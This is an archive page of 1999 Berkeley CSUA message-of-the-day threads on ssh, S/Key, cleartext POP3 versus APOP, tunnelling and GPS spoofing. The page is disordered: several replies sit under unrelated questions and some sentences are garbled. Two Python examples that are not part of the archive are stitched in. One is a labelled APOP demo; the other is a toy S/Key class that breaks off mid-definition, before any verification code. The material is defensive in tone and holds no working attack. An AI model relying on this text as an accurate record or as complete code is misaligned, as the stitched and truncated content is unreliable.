Computer SW Security - Berkeley CSUA MOTD

1999/9/28 [Computer/SW/Security] UID:16610 Activity:high
9/27    Anyone successfully installed ssh on FreeBSD 3.3?
        \_ just copy the binaries straight from soda.
        \_ sh ./configure ; make ; make install ; ssh-keygen ; ssh http://blah.com
           \_ cd /usr/ports/security/ssh; make install; make clean
                \_ it didn't work on my sys.   Something about rsaref not
                        able to compile.  How do I update the ports list?
        \_ use the source luke.
1999/9/20-21 [Computer/SW/Security, Computer/Networking] UID:16556 Activity:high
9/19    What is in.identd (running on port 113 (auth))? man isn't very
        clear on importance of the service.
        \_ T3 = 28xT1
        \_ From identd(8):
           identd is a server which implements  the  TCP/IP  proposed
           standard  IDENT  user identification protocol as specified
           in the RFC 1413 document.
           READ THE FUCKING RFC TWINK! --not tom
           \_ "READ THE FUCKING RFC.  I'M A FUCKING ASSHOLE."
              Grow up you fucking brat.
        \_ could this be the reason why .shost authentication doesn't work
           if you have this service turned off?
           \_ It's there to buxt the not-so-elite h4ckurz!!!!1
                \_ ssh does not use identd.  Turn it off, it's annoying.  -tom
                   \_ it does if linked against a libwrap.a that does
                      rfc 1413 lookups by default.
              \_ negligible, given that there is a lot more tightly coupled
                 copper wiring in the electrical cords, house wiring, etc.,
                 constant of the insulators.
1999/9/20-21 [Transportation/Car, Computer/SW/Security] UID:16553 Activity:low
9/18    anyone have a car and want a decent cassette deck?
        let me know... - danh
        \_ Boosting car stereos again danh?
1999/9/18-21 [Computer/SW/Security, Computer/SW/Unix] UID:16547 Activity:kinda low 77%like:16544
9/16    How do I pipe to an rsh? Say I want to do
        sort file | rsh machine -l user cat > file.sort
        \_ Exactly like that.  If it doesn't work for you, what error
           message do you get?
        \_ Wanna get rid of 20 lbs of ugly fat real fast?  Go in for a
           decapitation.
        \_ You might want to make sure you can rsh commands first.  I generally
           test with something lightweight like 'rsh remotemachine -l
           remoteuser whoami' first.  -ERic
        \_ Use ssh instead of rsh.
           \_ so your answer is?  Just do plain exercise and hope that the
              fat around your abs goes away?
        \_ s/rsh/ssh/g
        \_
            Assuming you have rsh set up properly do something like
            sort file | rsh machine -l user "cat > file.sort"
            or
            sort file | rsh machine -l user dd of=file.sort
            -ERic
1999/9/18-21 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:16546 Activity:low 61%like:16538
9/16    Thinking about getting a text pager (one where I can forward from
        these pagers and service cost? Thanks.
        \_ Bless you! Lynx with SSL rocks.
        \_ Fat Whacker!
        \_ Please rewrite this in English and I will try and answer.
           \_ Me speaky perfect goodly engrish so you fuck my mother!!!
1999/9/15-17 [Computer/SW/Security, Computer/SW/Unix] UID:16526 Activity:moderate
09/15   how would u transfer email addresses from an access database to a
        majordomo listserver every day? - turin (ie: ftp? or something else
        kewl i am missing?)
        \_ how do you automatically upload a file without being prompted
          with username and password via ftp?
          \_ .netrc . I wouldn't recommend it, though. --dim
           \_ pirate. way to go!!
                        \_ The Man is watching.
        \_ scp.
1999/9/15 [Computer/SW/Security] UID:16519 Activity:high
9/13    So once again, does anyone know the side effects of dexadrine?
        - oh and yes, bitch, I am CVSing this motd.
        \_ Whats the point of cvs'ing a single file?  -ERic (who has been
           rcs'ing the motd for months now)
           \_ I know what this does (send me porn passwords), but can someone
              give a formal definition of what is going on here?
        \_ is your ADD so bad you can't do a web search for dexadrine and
           side effects?
           \_ I don';t have add you stupid fuckin gmororn.` and if you
              can't understand why I'm taking it then get the fuck out
              of the machine.csua you've been calling your world.
        \_ Everything in here is wrong except the bits about
           "gmororn", "this", and "porn".
1999/9/9 [Computer/SW/Security] UID:16488 Activity:nil
9/9     http://www.rouze.com (came out a bit early)
1999/9/6 [Academia/Berkeley/CSUA, Computer/SW/Security] UID:16471 Activity:nil
9/6     I have lists of student ID numbers I want to verify.  Does Berkeley
        have some kind of service that lets me do this on a regular basis.
        (How does CSUA check SID against names or can someone just fill out
        a fake account form)?
        \_ http://regssl.berkeley.edu --jon
1999/9/3-5 [Computer/SW/Security] UID:16458 Activity:moderate
9/3     They're out there watching you:
        http://www.cnn.com/TECH/computing/9909/03/windows.nsa
        \_ Either MS was trying to please the DOJ to ease itself from the
           antitrust case, or it was simply an unintentional bug.
           \_ UNINTENTIONAL BUG? Jeeez, how stupid are you?
              Why do you think microsoft "easily" got through various
              crypto regulations, when everyone else is fighting
              nasty battles?
           \_ Hey, fuckhead: don't go selectively erasing replies.
              Particularly, on-topic, and ACCURATE replies.
              To repeat:
              How the hell can it be "unintentional".. you don't
              "accidentally" distribute something with an additional
              key that can unlock everything. It was deliberately
              put in. Anyone with a CLUE would realise this was to
              get NSA/government approval for their crypto API stuff.
              In fact, anyone with a clue would have realized this
              the minute they heard that MS got their crypto API
              'approved' a year ago or whatever. EXPORTABLE.
              This violates ITAR, without a back door!
        \_ see also http://www.cryptonym.com/hottopics/msft-nsa.html
           What I'm wondering is what MSFT gets in return?  Think they cut
           some deal with our buddies in the NSA?
        \_ it's all about the "__NSAKEY" reference
        \_ Read some of the rank 5 posts on /. for clue which you won't find
           here.
1999/9/3 [Computer/SW/Security, Computer/SW/Unix] UID:16456 Activity:high
9/2     Root decided to turn off ~lwall/bin/mail.pl without notice.
        E-mail root and let them know that you are opposed to this change!
        \_ it's a great idea.  shut up, nickkral  -tom
1999/8/30-9/1 [Academia/Berkeley/CSUA/Troll, Computer/SW/Security] UID:16435 Activity:high
8/30    Is there any possibility that politburo will reconsider their policy
        concerning ftp?  Too, we are unable to understand why POP3 access is ok
        whereas those of us who have a tough time comprehending s/key ftp
        have to suffer.  Plain text passwds are sent willy nilly via pop are they
        not?
                        \_ shut up, ikiru
        \_ Before you can begin to expect consistent policy from CSUA
           leadership, you need to exhibit consistent policy with your
           margins in the motd
        \_ The real answer is that since this is all done on a voluntary basis,
           they don't have time to lock down everything at once.  Your gripe
           that you're being unfairly treated while pop folks are somehow
           allowed to continue violating basic security concepts is ill
           conceived.  Expect that in time *all* of the incredibly lame
           services including pop will be either secured or disabled.
           If the csua was run by full time staff getting paid to do so, I'm
           sure this would have happened a long time ago.  kudos to root and
           any of root's elves who helped for putting in the time required and
           biting the bullet from the whiners with zero security clue.
           \_ Mikeh and the rest of root staff rock!
        \_ POP3 is cleartext; there will be no solution other than turning
           off POP3 for the foreseeable future (> 1 year).
        \_ APOP is trivial to implement, and not cleartext.  -tom
           \_ does APOP work with everyone's favorite GUI mail reader, or
              will they be bombarding root@csua with "My Outlook 95 doesn't
              work anymore?  Is e-mail b0rken?"  My assumption was that
              widespread conformance to encrypted POP won't happen in < 1
              year.  In regards to threads below, I eventually foresee
              turning off POP3, turning on APOP, and sending a mass e-mail to
              all CSUA members informing them of this and pine|elm|etc. and
              .forward.
          Turning off POP3
                 \_ no, ED IS!
                    ED! ED! ED IS THE STANDARD! answer
           would piss enough people off of anything I can imagine.  POP3
           cleartext is THE way to sniff pw's.  S/Key and ssh are a)
           steps in the right direction, and b) get the userbase accustomed
           to security annoyances.  The reasoning is suspect, but for me
           it's not something to put up a fight about since I believe I
           understand the pros and cons.  I look forward to non-availability
           of POP3 script-kiddie port sniffers. -non-Politburo sodan
           \_ Tough shit for the whining pop3 masses.  Let them forward their
              mail or read it locally.  I don't want to see soda broken into
              because some pop twits are too lazy to do the right thing.
              \_ then get off YOUR lazy ass and find an alternative.  Oh,
                 and PINE is not the answer.
                 \_ *I* don't have a security problem reading my mail.  If
                    you're one of those whining security clueless pop users,
                    the problem is yours, not mine.  *You* need to find an
                    answer, not me.  Go look at APOP if you simply *must*
                    use soda as your mail server.  I'm not lazy at all.  I
                    already solved this problem for myself years ago, thanks.
                    \_ Then when i crack your account by sniffing your passwd
                       and then bring down the internet with my elite hacking
                       and the blame all falls on you, ! H0P3 U $+!lL (@N Sl33P
                       @ |\|!6H+...
                       \_ D00d, th@t p05t3r uz3z 55H!  U l00z3!
                    \_ ED ED IS THE STANDARD!
                 \_ install unix it will cure cancer and bring you the
                    magical mystical gold at the end of the rainbow
                        \_ No, idiot.  You can't sniff my password.  My pw
                           never goes out in clear text.  You won't be cracking
                           my pw anytime soon.  It's *your* password I don't
                           want cracked.
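
The APOP exchange mentioned in the thread above, as an added example that is not part of the original MOTD posts: per RFC 1939 the client answers the server's greeting banner with MD5(banner + shared secret) instead of sending USER/PASS. The function names are illustrative; the greeting, user and secret are the sample values from RFC 1939.

```python
import hashlib
import hmac
import re

# Sample greeting, user and shared secret from the worked example in RFC 1939.
RFC_GREETING = "+OK POP3 server ready <1896.697170952@dbc.mtview.ca.us>"
RFC_USER = "mrose"
RFC_SECRET = "tanstaaf"

_BANNER_RE = re.compile(r"<[^<>\s]+@[^<>\s]+>")
_DIGEST_RE = re.compile(r"^[0-9a-f]{32}$")


def extract_timestamp(greeting):
    """Return the <process-ID.clock@hostname> banner, or None if APOP is not offered."""
    if not greeting.startswith("+OK"):
        return None
    match = _BANNER_RE.search(greeting)
    return match.group(0) if match else None


def apop_digest(timestamp, secret):
    """MD5 over the banner (angle brackets included) followed by the shared secret."""
    return hashlib.md5((timestamp + secret).encode("ascii")).hexdigest()


def client_login_lines(greeting, user, secret):
    """Lines the client sends when it insists on APOP."""
    timestamp = extract_timestamp(greeting)
    if timestamp is None:
        # No banner means only USER/PASS is available; refuse rather than
        # fall back to putting the password on the wire.
        raise ValueError("server does not offer APOP; refusing cleartext login")
    return ["APOP %s %s" % (user, apop_digest(timestamp, secret))]


def cleartext_login_lines(user, secret):
    """Plain POP3 login, shown for comparison: the password is sent as-is."""
    return ["USER " + user, "PASS " + secret]


def server_verify(timestamp, secrets, command):
    """Server side: recompute the digest for the banner issued on this connection."""
    parts = command.split(" ")
    if len(parts) != 3 or parts[0] != "APOP":
        return False
    _, user, digest = parts
    digest = digest.lower()
    secret = secrets.get(user)
    if secret is None or not _DIGEST_RE.match(digest):
        return False
    # Constant-time comparison of the two hex strings.
    return hmac.compare_digest(apop_digest(timestamp, secret), digest)


def password_visible(lines, secret):
    """True if a sniffer reading these lines would see the password itself."""
    return any(secret in line for line in lines)


if __name__ == "__main__":
    apop = client_login_lines(RFC_GREETING, RFC_USER, RFC_SECRET)
    plain = cleartext_login_lines(RFC_USER, RFC_SECRET)
    print("APOP on the wire:     ", apop, "password visible:", password_visible(apop, RFC_SECRET))
    print("USER/PASS on the wire:", plain, "password visible:", password_visible(plain, RFC_SECRET))
    banner = extract_timestamp(RFC_GREETING)
    print("server accepts:", server_verify(banner, {RFC_USER: RFC_SECRET}, apop[0]))
    # A digest captured from one connection does not verify against a new banner.
    print("replayed later:", server_verify("<1.2@pop.example>", {RFC_USER: RFC_SECRET}, apop[0]))
```

APOP keeps only the password off the wire; the mail itself still crosses the network unencrypted, and the server has to hold the shared secret in recoverable form to recompute the digest.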
1999/8/30 [Computer/SW/Security] UID:16428 Activity:high
8/29  Hillary involved in Waco fire deaths!  http://www.drudereport.com/matt.htm
1999/8/28 [Computer/SW/Unix, Computer/SW/Security] UID:16415 Activity:nil
8/27    Can I use ssh port forwarding to FTP to soda?
        What port do I need connect to at soda?
        \_ Yes, but you'll still need to login using S/Key
           \_ if you do it right, you do not need s/key
               \_How do I do it Right?
1999/8/28-30 [Computer/SW/Security] UID:16410 Activity:nil
8/27    Does shost use a callback scheme to authenticate the host? I'm
        having problems doing an shost login through a firewall. Of course,
        I bet all those die hard security people are going to flame me
        for using shost now.
        \_ try an ssh -v.  It may be failing because it's trying to authorize
           the client's host key.  IIRC, to use shosts, at least with the
           config on soda, your client key must be in soda:~/.ssh/known_hosts
        \_ Some firewalls don't pass privileged ports properly.  Try "ssh -P"
1999/8/26 [Computer/SW/Security] UID:16400 Activity:insanely high
8/25    Can someone finish this off. I'm trying to get rc.local to
        automatically establish a secure tunnel to uclink4 but I can't
        seem to get expect to work.
        ssh -f -lmyusername -L 143:uctwink4:143 uctwink4 _???_
        \_ seems ok to me, but I think it would still require a passwd
                unless you use RSA (-i identity file). But I may be
                wrong, I'm no guru. -chingon
                \_ Where I have a _???_ I had it execute an expect
                   script like
                   #!/usr/local/bin/expect -f

                   expect "password: "
                   send -- "mypassword\r"

                   that didn't seem to work. It still asked me for a password
                \_ you want expect to spawn ssh instead, because it's
                   ssh that's asking you for the password.
                   \_ Then what goes in place of the _???_
                      \_ try "sleep 1800" (which uclink actually ignores
                         but which is correct in general and which makes
                         ssh happy)
1999/8/25-28 [Computer/SW/Security] UID:16394 Activity:nil
8/25    Does the modified s-key telnet login system use ip identification
        to associate user name with challenge offerings? For instance,
        if I login with my user name misspelled, the password: prompt
        appears without offering an s-key challenge. so my question is
        how does skey know when to offer a challenge?
        \_ If there is no account with the name you typed, skey can't be
                set up for that username, so it can't challenge.
        \_ there is so much m, you must rtfm
1999/8/24-26 [Computer/SW/Security] UID:16387 Activity:kinda low
8/24    I don't understand why ftp is s/key enabled but tons of
        folks still pop their mail that is still a big security hole for
        the less competent users of soda I believe
        \_ Wrapped for the good of the people.
           \_ Wrapped with what?  tcpwrappers is useless unless you
              actually enable some rules.
        \_ One step at a time.  Secure POP/IMAP methods are being investigated.
           \_ Step one should be to THINK ABOUT THE ACTUAL AFFECT
                \_ effect.
           \_ I don't know if this is enforceable, but I use an SSH tunnel
              to soda's IMAP server.  That's a possible alternative.
              \_ It's trivially enforceable (just have TCP wrappers only
                 allow connections from localhost).
1999/8/24 [Computer/SW/Security] UID:16385 Activity:nil
8/23    Someone turn off the POP3 port (110) ? More unneeded security
        for the CSUA penitentiary?
        \_ No, I think it's just hozed. Try mailing root.
1999/8/19-20 [Computer/SW/Security] UID:16348 Activity:high
8/19    Is it possible to disrupt GPS signal? Can Russians/Chinese send
        a satellite that sends false signal?
        \-well i guess i am now the gps "expert". well, yes, of course
        the system/signal can be disrupted. whether it can be spoofed
        is a trickier question ... because that is a detection-evasion
        issue. the answer depends on what scenario you are looking at.
        there is considered anti-spoofing engineering that has gone into
        the system and the protocol/signal design. if you have a more
        specific question, i may have a more specific answer. --psb
        \_ whatever.  zip your pants back up.
        \_ Not to mention that the signal is encrypted (PPS) and purposefully
           munged (bias in SPS). --dim
                \-the question is about a hostile attack [denial/spoof] which
        is different from an attack on an encryptions system [which is about
        extracting info, not restricting info or false info] so this normal
        mode isnt especially relevant. you seem to be getting at the source of
        errors. there are a huge number of sources of errors, some of them
        mathematical and contrived, other from circumstances [signal quality
        where you are, HDOP, etc.] or from nature [ionospheric delay [also
        measured in L2 channel]]. SPS bias [called SA] is usually about
        100m XY, 150m Z, and 350ns time but this too is varied to limit how
        much refining you can do by long observations in carrier phase mode.
        on the L2 [secure channel], in addition to the normal encryption
        [P code], there is hardened mode for spoof detection which involves
        re-encrypting the L2 signal into Y code ... you need an even higher
        clearance for Y than PPS. i will now have to kill all of you. --psb
        \_ I was more addressing the "false signal" aspect than the
           "interrupt" aspect. Since the signal is encrypted, it would
           seem it would be difficult to spoof unless the spoofed signal
           used the same encryption algorithm. --dim
                \not necessarily. i am not sure if a "playback attack" would
        work because time is part of the encoding but in theory you could
        record the L2 telemetry and just play it back at the wrong time.
        i am not sure what receivers would do with that. again it depends
        how exotic a scenario you want to envision ... i mean if the russian
        can park a mini-black hole next to the SV and slow down the cesium and
        rubidium clocks on the satellite that would work too. i mean yes
        your answer acknowledges "there is some security in the system". --psb
        \_ A playback attack of this sort is (if it worked) basically a
           denial of service attack. I was more referring to an attack
           that would result in a diabolical signal skewed from the
           original by some known coordinates. It might be possible, but
           not easy to do. I agree that denial of service is the simplest
           way to go, but it's more obvious and less vile. --dim
                \-this is not what is usually considered a DoS. That would be
        more analogous to blocking the signal or some other way of preventing
        satellite lock. that's a spoof attack. --psb
        \_ Semantics. Using a spoof attack to deny service. Depends on
           what the original poster meant by "false signal". Of course,
           now that I think about it, wouldn't the original signal have
           to be jammed in some way first? How would the receivers react
           to multiple signals? --dim
                \-if i spoof a source address and use this to break into your
        machine and i use that to read your resume to find out your home
        address and then come over and cut your fingers off, i wouldnt call
        that a DoS or a spoof attack. what would you call it? nice account
        name. --psb
        \_ Dude, chill out on the coffee. You know what I meant and that's
           why I used the word "basically". --dim
                \-psb      ttyPv   Aug 10 00:38   (coffeehut.lbl.gov)
        \_ So it sounds easy to "disrupt" signal. So how hard can it be for
           Milosevich to send out GPS signals? If he had done it from the
           beginning, then there wouldn't be any cruise missile right?
        \_ Yeah I totally saw this in a movie and like thought James Bond was
           like really cool with this Chinese chick and they like you know
           figured it out and stopped the bad guy and totally were on the
           make so yeah the Russians can probably do it and steal our people
           who are out boating and stuff and make them boat to Russia and be
           held captive while hiking and stuff so like uh huh nuke 'em before
           they take over the GPS because then they could boatjack our navy
           and make these really cool ufos the airforce have get confused and
           land in China or Russia or Iraq!!!!
1999/8/13-15 [Politics/Foreign/Asia/China, Computer/SW/Security] UID:16312 Activity:kinda low
8/13    Anyone seen this?  I wonder if we could determine if it's for real:
        http://www.iacr.org/~iacr/misc/china
        I'm trying to find alternate sources of verification.   -brain
        \_ It's obviously a hoax.  No one is going to hand over $300m in gold
           because someone found a tablet.  It's ridiculous.
        \_ i've just deciphered it. The text tells of the location of
           the Ark of the Covenant
        \_ I saw a problem with the date, it says ROC year 1933, but
           there's no ROC year 1933.  Obviously, it's western year
           1933, which is ROC year 22.
           \_ Another problem is that the "Hua" character in "Chung Hua Min
              Kwo" (Republic of China) is in Simplified character which was
              not used in ROC and in present Taiwan.  Simplified character
              is only used by Communist China which was founded in 1949.
              -- yuen
        \_ I have discovered the solution to this problem, but the motd is
           too small to contain it.  -fermat
           \_  umm, okay, really I was asking, "I wonder if there are actual
               gold bars with valid encrypted data on them, and if so, what
               the encrypted message is."  The transaction detailed by the
               story is actually irrelevant, because, as you say, it's a
               sure bet that the account is no longer valid.     -brain
1999/8/6 [Computer/SW/Security, Computer/SW/Unix] UID:16264 Activity:high
8/6     After www.windows2000test.com has gone down 3 times crack.linuxppc.org
        has yet to do so nor has it been cracked.  For any of you interested,
        the root password is linuxppc. [not any more it aint]
        Give it a shot and win a free computer.
        \_ lemme guess. set up by the same schmuck that put up a target
           at defcon, running OFF A CDROM DRIVE.
           If I wasn't too busy,I'm tempted to nail the damn thing myself.
           But then again, where the hell can I get a "normal" linuxppc
           account to compile stuff?
           \_ on your mac
              \_ Exactly.  How many LinuxPPC users out there?  Also, I
                 was under the impression that the PPC code was not open
                 source.  Is that correct?
                        \_ It can't include Linux kernel sources if it's
                                not "open source" (GPL'ed)
        \_ Gee, my computer might go down too if STRUCK BY LIGHTNING.
           \_ Somebody did a traceroute and found that all of the routes
              up until the machine was still operational.  Microsoft
              claimed that the router failed.  It's summer, the weather's
              good
1999/8/2-3 [Computer/SW/Security] UID:16222 Activity:moderate
8/1     Anyone taken a look at, or know anyone who has taken a look at the
        source for pgp 6.5.1.  For some reason i have more faith in the
        integrity of the older versions. (Just 'cause i'm paranoid doesn't
        mean that they're not out to get me).
        \_ What makes you suspicious of 6.5.1?
           \_ Old Cavalry are suspicious of tanks.  It is just because,
              back in the day, i was around paranoid types that i trusted
              who said PGP had been checked and was o.k. That was
              pre pgp_for_windows and pre talk of clipper chips.
        \_ I looked at it.  Did you see the function in there called
           SendKeyAndDataToJanetReno@FBI.GOV???  I was shocked but it's
           really in there!  No kidding!
1999/8/1-2 [Computer/SW/Security, Computer/SW/Unix] UID:16219 Activity:very high
8/1     http://istpub.berkeley.edu:4201/bcc/Sept_Oct99/avc.students.html
        IS&T once again tries to catch up to what student groups have provided
        for the last 10 years, and only manages to see part of the picture.
        (Last time, they decided all students needed was e-mail and we got
         UCLink.  Just imagine how screwed up this new file server will be.)
         \_ soda [21] wc -l /etc/passwd
               2501 /etc/passwd
            Think of how disastrous that would be to provide 30,000
            traditional style login accounts on a single computer (not to
            mention how expensive the hard disk space would be). The fact
            is that most majors don't require a unix shell account but it
            would be nice for the common Berkeley student to have some unix
            experience.  Unfortunately costs and needs don't always coincide.
                \_  Utterly lame!  If i'm making $20+/hr being a paralegal
                    or a doctor I don't have the time or the inclination to
                    fiddle around with unix man pages.  I am more productive
                    using 1. an interface I'm used to (since I'm not a
                    programmer what do I care about software development) and
                    2. an interface that supports applications ALL MY
                    COLLEAGUES IN _MY_ (not YOUR) FIELD USE.  I'd rather spend
                    my time ski-ing or outdoors than fiddling around with
                    .conf files.
                    \_ That's funny.  I have time to do my regular school
                       work, fiddle with .conf files, read the fucking man
                       pages, and go skiing.  And unix is VERY useful for
                       people not in the CS major.  Go ask the people at
                       LBL what they use for physics simulations.
                       \_ dear God, is the bigotry so deep within you that you
                          fail to see the point?  The point is that I AM NOT
                          YOU.  I DO NOT WANT TO BE LIKE YOU.  What if i
                          said I was a pre med student who spends time commuting
                          to various hospitals in the area?  That's more than
                          just regular school work.  Tell me, is unix helpful
                          in my anatomy class?  Is it useful for LabView?
                          is it useful in my philosophy class?  Is it useful
                          when I call my girlfriend up and see what time she'd
                          be ready to go see the opera?
                          Climb out of your cubicle, man.
                        \_ idiocy deleted.
                        \_ fascist nazi.  What gives you the right to delete
                           people's opinions at your whim?  What's next after
                           your ssh tactics?  rm -rf people you don't like?
                    my time with my friends or girlfriend than fiddling around
                    with .conf files. - Publius
                   \_ uh, so why do you care if people who are *not* idiots
                      have Unix shell access?  You can diddle around with
                      Netscape all you want, regardless.  -tom
                    \_ It's about the opportunity to do what you want.
                \_ Why use a single computer?  The OCF provided 12,000+ login
                        accounts 5 years ago on a cluster of 1989-era machines
                        (Motorola 68030 & 040 based apollos).  As for disk
                        space, that's what IS&T is proposing to do.
                \_ providing shell access to uclink4, for example, would
                   lower CPU usage (POP is very expensive) and support costs.
                   The support cost argument is bullshit; if you look at
                   the total cost picture, having shell access is much
                   cheaper.  What IST means when they say "it costs less"
                   is "it costs US less". -tom
                   \_ IS&T has a history of ignoring reality, tom.   you
                      should know that.
                   \_ Support costs go up when idiots start wanting to use
                      shells.
                \_ I would say, rather, that they ignore campus concerns in
                   favor of doing things which are convenient for them.  -tom
        \_ They should buy a NetApp.
           \_ NetApp's suck. EMC, dude.
        \_ let's take this to http://ucb.computing.announce (ucb.computing.discussion
           would be better but there is no such group ... yet) --jon
           \_ hence, mail root@agate
              \_ hence the "... yet" --jon
           \_ Okay, now let's take this to http://ucb.computing.discussion --jon
1999/7/30-31 [Computer/SW/Security, Computer/SW/OS/Windows] UID:16207 Activity:moderate
7/29    I have a friend.  Or rather, I had a friend.  I very recently
        killed him.  My friend believed he could safely install linux
        on a partition on my win95 machine while I slept.  The long and
        short of the story is that he couldn't, and I now have no DOS
        partitions.  I don't think any of the data was screwed up, but the
        partitions aren't there anymore.  Could someone recommend a
        utility or two to try to recover some files?  -mjm
        \_ need more info about your current state.  does linux boot up?
           if it does you can recover much of the fat32 partition and place
           it on some storage medium.  try running fips and see what the
           partitioning tables look like
        \_ where did you bury the corpse?
            \_ Linux boots up.  The partition table is all jacked.  (It's
               got the parts that linux created, but they're nothing like
                what the original were.)  I've got FAT16, if that matters.
                I do kinda remember what the partition sizes were.
                \_ by the way, it would probably be better if you run
                   /sbin/fdisk and type p to print out the partition table
                   and post the results on the motd.  --jeff
                \_ If you would like to backup your dos partition here's
                   what you do.  In the /etc/fstab file, add the entry
                   /dev/hda1    /mnt/dos        vfat defaults   0 0
                   or something like that.  the first field is the device
                   that your dos partition is on and /mnt/dos is the directory
                   that you want to mount your dos partition.  then issue
                   the command "mount /dev/hda1" and you can access your dos
                   partition in /mnt/dos.  How you get that drive backed
                   up is another story.  Too complicated?
                   Try going into your /etc/lilo.conf file.  If you're using
                   RedHat you might have an entry like

                   other=/dev/hda1
                        label=dos
                        table=/dev/hda

                   If there isn't one add it and run /sbin/lilo.  Of course
                   make sure that /dev/hda1 is where your dos partition is.
                   Reboot your computer and at the LILO: prompt type "dos"
                   and it should boot up into Windows.  Deleting the linux
                   partition (I'm not sure why you want to do that) is a
                   matter of running fips or partition magic and running
                   fdisk /MBR at the dos prompt.  Hope that helps.  --jeff
        \_ Your friend did you a big favor. It's about time you accepted that
           Win95 is obsolete and started using the best technology that is
           available: Linux 2.2.x. Don't recover your DOS partitions, forget
           about the dark side and start living in the future of computing.
1999/7/23 [Computer/SW/Security] UID:16187 Activity:low
7/22    Regarding s/key -- is it at all useful to set it up if
        I regularly use ssh to login?  And if I do set it up, will
        I have to use the s/key passwords when I log in via ssh?
        \_maybe.  will you always have ssh available?  setting up skey
                only affects telnet and ftp, not ssh.
                \_ yes, you'll need S/Key for ftp
        \_ s/key is a good thing for if you don't have access to ssh, or
          for some reason like plaintext, one-time, passwords and plaintext
          transmission of your session better than a fixed password and an
          encrypted session.  It helps to read the info you can find on the
          web about the two different technologies.  But no, you don't have
          to use both.
1999/7/22-23 [Computer/SW/Security] UID:16185 Activity:moderate
7/22    If someone didn't set up s/key (i.e. keyinit) before the 15th,
        and now doesn't have access to ssh, is there any way he can set
        up s/key?
        \_ log into a machine that has ssh, and ssh into soda.
           \_ What part of "doesn't have access to ssh" didn't you
              understand?
        \_ does "someone" have access to a Java-capable browser?
           Use http://www.csua.berkeley.edu/ssh
           \_ Read the question again.  I didn't ask for generating
              OTP's.  I asked about what to do if 'keyinit' wasn't run
              before July 15.  Someone like this logs in and does not
              get an s/key challenge.  Oh yes, and *someone* really is
              someone other than me.  Moron.
              [my rude answer deleted.  sorry.]
              \_ The answer has nothing to do with generating OTPs.  As
                 the official motd says, a java ssh client is available
                 at ...edu/ssh.  Try not to be such a fucking jerk the
                 next time someone tries to post a helpful motd answer --pld
                 \_ Sorry.  I totally blew it reading the answer.  My
                    apologies to whomever gave the answer that I so
                    stupidly ignored.
              \_ Huh?  I don't know about s/key and I've never run "keyinit"
                 or anything like that.  I just downloaded an SSH client and
                 now I can log in fine.  -- yuen
              \_ Exactly. I've basically ignored all this S/Key stuff. You
                 don't *need* it to log in. Or have you ever tried logging
                 in withOUT whatever this s/key thing is?
1999/7/22-23 [Computer/SW/Unix, Computer/SW/Security] UID:16184 Activity:nil
7/22    How do you log off those people who are still using a telnet session
        since the pre-ssh enforcement period?
        \_ The ban is on cleartext passwords.  Using telnet is fine.
1999/7/22-23 [Computer/SW/Security] UID:16181 Activity:nil
7/22    How do you prolong your ssh session such that the server doesn't
        automatically log you out? --converted ssh user
        \_ don't use keepalives, fix your firewall, don't use tcsh autologout
1999/7/20 [Computer/SW/Security, Computer/SW/OS/Windows] UID:16165 Activity:moderate
7/19    More NT security hole:
        http://support.microsoft.com/support/kb/articles/Q221/9/91.ASP
        \_ Why do you folks keep posting old MS holes?  Subscribe to the
           MS security bulletin service and ntbugtraq and be done with it.
           \_ B3CUZ L1NUX 1Z TH3 P3RF3CKT 0S W1TH AB0LUT3L3 N0 S3KUR1TY
              H0L3S AT ALL, D00D!!1!!  TH1Z PRUV3S 1T!!1!!!
        \_ Also http://support.microsoft.com/support/kb/articles/Q234/5/57.ASP
1999/7/16 [Computer/SW/Security, Academia/Berkeley/CSUA/Motd] UID:16144 Activity:moderate
07/15   I don't get s/key... isn't soda supposed to issue an s/key
        challenge when I ftp into soda?
        \_ You must be this tall to use skey
        \_ You have to set up your key first.  see man skey(1)
                \_ soda.CSUA.Berkeley.EDU% man skey(1)
                   Badly placed ()'s.
                   \_ You must be this tall to use man
                   \_ "skey(1)" means to type "man 1 skey" -- it looks up skey
                      in manual section 1 (user commands).  The section number
                      is optional, but it matters if there are two manpages
                      with the same name -- for example, printf(1) tells you
                      about the "printf" command-line utility, but printf(3)
                      tells you about the C library function.
                        \_ SONOFABITCH!! I can't believe someone actually posted
                           a useful and non-insulting reply!! Surely the motd
                           gods will banish you for eternity! You asked for it!
                   \_ man skey
1999/7/15-16 [Computer/SW/Security, Computer/SW/Unix] UID:16138 Activity:high
7/14    S/Key is neat-o.  It works even if you don't have ssh.
        \_ S/Key is useful, but understand that it only protects your _soda_
           password.  If you connect to soda using telnet and s/key, then
           telnet somewhere else and type your ordinary password for that place,
           it can be sniffed.  ssh is not an annoying frivolity, it is a good
           thing; use it if you can.  --dbushong
        \_ Question (not necessarily rhetorical)- Is giving your password to a
           web-based java applet really an improvement over telnet?
                \_ Yes, because your password is encrypted before leaving the
                    machine.  (Of course, the csua should put it on an ssl
                    httpd for the truly paranoid.)
           Yeah, yeah, Java is secure, but aren't there ways around that
           too?
           \_ so download the applet, and install it on your own server.
              Then worse case, it could only communicate back to THAT
              server. And/or just set your security settings to disallow
              applets from making ANY net connections.
              \_ So wouldn't it be nice to have an authorized s/key
                 applet on soda?
                 \_ http://www.csua.berkeley.edu/skey
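The one-time-password chain behind S/Key, as an added example (not code from this thread or from soda's skey source). It assumes SHA-256 truncated to 64 bits as a stand-in for S/Key's MD4-based function, and the class, function and account names are hypothetical. It shows why a sniffed one-time password cannot be replayed; as noted in the thread, this protects only the password for this host, and the rest of a telnet session still crosses the wire in the clear.

```python
"""Toy S/Key-style one-time-password chain (illustrative only)."""
import hashlib
import hmac


def f(data: bytes) -> bytes:
    # Assumption: SHA-256 truncated to 64 bits stands in for S/Key's
    # MD4-based one-way function; the chain logic is what matters here.
    return hashlib.sha256(data).digest()[:8]


def otp(passphrase: str, seed: str, count: int) -> bytes:
    """Client side: hash seed+passphrase once, then apply f() `count` times."""
    value = f((seed + passphrase).encode())
    for _ in range(count):
        value = f(value)
    return value


class SKeyServer:
    """Server side: keeps only the last accepted OTP, never the passphrase."""

    def __init__(self):
        self.users = {}  # user -> {"seed": str, "seq": int, "last": bytes}

    def keyinit(self, user: str, seed: str, seq: int, top_otp: bytes) -> None:
        # Hypothetical stand-in for the state a keyinit run leaves behind:
        # the top of the chain, f applied `seq` times.
        self.users[user] = {"seed": seed, "seq": seq, "last": top_otp}

    def challenge(self, user: str):
        """Return (count, seed): the user must answer with otp(..., count)."""
        entry = self.users[user]
        if entry["seq"] == 0:
            raise RuntimeError("chain exhausted; keyinit must be run again")
        return entry["seq"] - 1, entry["seed"]

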